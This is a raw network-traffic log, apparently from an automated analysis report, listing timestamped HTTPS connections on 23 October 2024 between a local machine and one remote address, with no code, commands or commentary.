                  Oct 23, 2024 06:48:11.259366989 CEST4434980513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.259423018 CEST4434980513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.260180950 CEST49804443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.260180950 CEST49804443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.260196924 CEST4434980413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.260200024 CEST4434980413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.270226955 CEST4434980613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.271223068 CEST49806443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.271236897 CEST4434980613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.274544001 CEST49806443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.274548054 CEST4434980613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.374732971 CEST4434980313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.374932051 CEST4434980313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.375184059 CEST49803443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.388439894 CEST4434980213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.388623953 CEST4434980213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.389146090 CEST49802443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.391613960 CEST4434980413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.391824961 CEST4434980413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.391972065 CEST49804443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.395198107 CEST49803443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.395198107 CEST49803443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.395251036 CEST4434980313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.395279884 CEST4434980313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.396747112 CEST49802443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.396774054 CEST4434980213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.396841049 CEST49802443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.396847010 CEST4434980213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.398163080 CEST49804443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.398173094 CEST4434980413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.398303986 CEST49804443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.398308992 CEST4434980413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.401405096 CEST49807443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.401505947 CEST4434980713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.401670933 CEST49807443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.402405977 CEST49807443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.402407885 CEST49808443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.402443886 CEST4434980713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.402456999 CEST4434980813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.402668953 CEST49808443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.403623104 CEST49809443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.403655052 CEST4434980913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.403711081 CEST49809443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.403871059 CEST49809443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.403891087 CEST4434980913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.406512976 CEST49808443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.406547070 CEST4434980813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.407444954 CEST4434980613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.407814980 CEST4434980613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.410650015 CEST49806443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.410650015 CEST49806443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.410844088 CEST49806443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.410851002 CEST4434980613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.412910938 CEST49810443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.412935972 CEST4434981013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.413100958 CEST49810443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.413100958 CEST49810443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.413151979 CEST4434981013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.418790102 CEST4434980513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.419425011 CEST4434980513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.419920921 CEST49805443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.419970989 CEST49805443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.419970989 CEST49805443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.419996023 CEST4434980513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.420021057 CEST4434980513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.422240019 CEST49811443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.422266960 CEST4434981113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:11.422468901 CEST49811443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.422468901 CEST49811443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:11.422497034 CEST4434981113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.130795002 CEST4434980913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.131257057 CEST49809443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.131278038 CEST4434980913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.131721973 CEST49809443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.131728888 CEST4434980913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.140467882 CEST4434980813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.140808105 CEST49808443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.140870094 CEST4434980813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.141279936 CEST49808443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.141294956 CEST4434980813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.144480944 CEST4434980713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.144910097 CEST49807443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.144974947 CEST4434980713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.145121098 CEST49807443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.145138025 CEST4434980713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.154247999 CEST4434981113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.154526949 CEST49811443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.154535055 CEST4434981113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.155015945 CEST49811443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.155021906 CEST4434981113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.257666111 CEST4434980913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.257817984 CEST4434980913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.257855892 CEST49809443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.258069038 CEST49809443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.258083105 CEST4434980913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.258090973 CEST49809443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.258096933 CEST4434980913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.265021086 CEST49812443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.265114069 CEST4434981213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.265189886 CEST49812443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.265599012 CEST49812443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.265635014 CEST4434981213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.270965099 CEST4434980813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.271251917 CEST4434980813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.271332026 CEST49808443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.271409988 CEST49808443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.271409988 CEST49808443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.271447897 CEST4434980813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.271473885 CEST4434980813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.277405977 CEST4434980713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.277734995 CEST4434980713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.277784109 CEST49807443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.278424978 CEST49813443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.278449059 CEST4434981313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.278626919 CEST49813443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.278907061 CEST49807443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.278907061 CEST49807443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.278932095 CEST4434980713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.278956890 CEST4434980713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.282105923 CEST49813443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.282118082 CEST4434981313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.283620119 CEST4434981113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.283690929 CEST4434981113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.283736944 CEST49811443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.284171104 CEST49811443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.284177065 CEST4434981113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.284184933 CEST49811443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.284188032 CEST4434981113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.286571980 CEST49814443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.286604881 CEST4434981413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.286674023 CEST49814443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.286799908 CEST49814443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.286820889 CEST4434981413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.290046930 CEST49815443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.290061951 CEST4434981513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.290117025 CEST49815443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.290791035 CEST49815443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.290807962 CEST4434981513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.500725031 CEST4434981013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.501693010 CEST49810443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.501729965 CEST4434981013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.502944946 CEST49810443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.502958059 CEST4434981013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.632169962 CEST4434981013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.632755995 CEST4434981013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.632810116 CEST49810443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.632879972 CEST49810443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.632896900 CEST4434981013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.632925987 CEST49810443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.632940054 CEST4434981013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.638443947 CEST49816443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.638482094 CEST4434981613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:12.638536930 CEST49816443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.638969898 CEST49816443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:12.638984919 CEST4434981613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.005968094 CEST4434981213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.007008076 CEST49812443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.007071972 CEST4434981213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.008733988 CEST49812443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.008749962 CEST4434981213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.017383099 CEST4434981413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.019006014 CEST49814443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.019020081 CEST4434981413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.020023108 CEST4434981513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.020086050 CEST49814443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.020096064 CEST4434981413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.020601034 CEST49815443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.020623922 CEST4434981513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.022264004 CEST4434981313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.022294998 CEST49815443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.022301912 CEST4434981513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.022965908 CEST49813443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.022974014 CEST4434981313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.026623964 CEST49813443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.026628017 CEST4434981313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.137970924 CEST4434981213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.138127089 CEST4434981213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.138438940 CEST49812443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.138438940 CEST49812443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.138438940 CEST49812443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.140659094 CEST49817443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.140702009 CEST4434981713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.140949965 CEST49817443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.140949965 CEST49817443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.141001940 CEST4434981713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.145936966 CEST4434981413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.146086931 CEST4434981413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.146212101 CEST49814443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.146212101 CEST49814443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.146327019 CEST49814443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.146368980 CEST4434981413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.147937059 CEST49818443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.147994995 CEST4434981813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.148186922 CEST49818443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.148186922 CEST49818443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.148256063 CEST4434981813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.150626898 CEST4434981513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.150840044 CEST4434981513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.150914907 CEST49815443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.150914907 CEST49815443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.150938988 CEST49815443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.150949001 CEST4434981513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.152697086 CEST49819443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.152745008 CEST4434981913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.152947903 CEST49819443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.152947903 CEST49819443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.152997971 CEST4434981913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.155102968 CEST4434981313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.155378103 CEST4434981313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.155440092 CEST49813443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.155440092 CEST49813443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.155491114 CEST49813443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.155497074 CEST4434981313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.157066107 CEST49820443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.157155991 CEST4434982013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.157294035 CEST49820443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.157361031 CEST49820443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.157381058 CEST4434982013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.345727921 CEST49812443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.345776081 CEST4434981213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.377146006 CEST4434981613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.377906084 CEST49816443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.377906084 CEST49816443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.377943039 CEST4434981613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.377969027 CEST4434981613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.507245064 CEST4434981613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.507425070 CEST4434981613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.507714033 CEST49816443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.508128881 CEST49816443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.508160114 CEST4434981613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.508219004 CEST49816443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.508236885 CEST4434981613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.511301994 CEST49821443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.511336088 CEST4434982113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.511502981 CEST49821443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.511596918 CEST49821443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.511603117 CEST4434982113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.896962881 CEST4434981913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.898205042 CEST4434981813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.898358107 CEST4434982013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.899269104 CEST4434981713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.900269032 CEST49817443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.900332928 CEST4434981713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.901324034 CEST49817443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.901386976 CEST4434981713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.901823044 CEST49819443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.901849031 CEST4434981913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.902570009 CEST49819443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.902581930 CEST4434981913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.902971983 CEST49818443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.902990103 CEST4434981813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.903672934 CEST49818443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.903678894 CEST4434981813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.904197931 CEST49820443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.904257059 CEST4434982013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:13.905194044 CEST49820443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:13.905206919 CEST4434982013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.031258106 CEST4434981713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.031454086 CEST4434981713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.031511068 CEST49817443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.031837940 CEST49817443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.031855106 CEST4434981713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.031863928 CEST49817443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.031869888 CEST4434981713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.032836914 CEST4434981913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.033068895 CEST4434981913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.033118010 CEST49819443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.034311056 CEST49819443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.034315109 CEST4434981913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.034322977 CEST49819443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.034327030 CEST4434981913.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.039486885 CEST49822443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.039577961 CEST4434982213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.039647102 CEST49822443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.040994883 CEST49823443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.041018963 CEST4434982313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.041074991 CEST49823443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.041435957 CEST49822443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.041471004 CEST4434982213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.041604996 CEST49823443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.041615009 CEST4434982313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.042016029 CEST4434982013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.042159081 CEST4434982013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.042208910 CEST49820443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.042294025 CEST49820443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.042294025 CEST49820443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.042319059 CEST4434982013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.042341948 CEST4434982013.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.045778036 CEST49824443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.045826912 CEST4434982413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.045893908 CEST49824443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.046261072 CEST49824443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.046288967 CEST4434982413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.065243959 CEST4434981813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.065382957 CEST4434981813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.065443993 CEST49818443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.065505981 CEST49818443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.065505981 CEST49818443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.065534115 CEST4434981813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.065561056 CEST4434981813.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.068830967 CEST49825443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.068856001 CEST4434982513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.068912029 CEST49825443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.069188118 CEST49825443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.069201946 CEST4434982513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.249077082 CEST4434982113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.249891996 CEST49821443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.249902964 CEST4434982113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.250997066 CEST49821443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.251000881 CEST4434982113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.379870892 CEST4434982113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.380029917 CEST4434982113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.380079985 CEST49821443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.380163908 CEST49821443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.380172014 CEST4434982113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.380199909 CEST49821443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.380203962 CEST4434982113.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.383497953 CEST49826443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.383538008 CEST4434982613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.383610010 CEST49826443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.383781910 CEST49826443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.383816957 CEST4434982613.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.778453112 CEST4434982413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.779242992 CEST49824443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.779289007 CEST4434982413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.780082941 CEST49824443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.780095100 CEST4434982413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.781363010 CEST4434982313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.782177925 CEST49823443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.782187939 CEST4434982313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.782486916 CEST49823443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.782490015 CEST4434982313.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.787738085 CEST4434982213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.788163900 CEST49822443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.788242102 CEST4434982213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.788702965 CEST49822443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.788722992 CEST4434982213.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.819448948 CEST4434982513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.837109089 CEST49825443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.837110043 CEST49825443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.837138891 CEST4434982513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.837150097 CEST4434982513.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.908207893 CEST4434982413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.908554077 CEST4434982413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.909126043 CEST49824443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.909173012 CEST49824443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.909173012 CEST49824443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.909198046 CEST4434982413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.909220934 CEST4434982413.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.911365986 CEST49827443192.168.2.413.107.246.60
                  Oct 23, 2024 06:48:14.911405087 CEST4434982713.107.246.60192.168.2.4
                  Oct 23, 2024 06:48:14.911598921 CEST49827443192.168.2.413.107.246.60
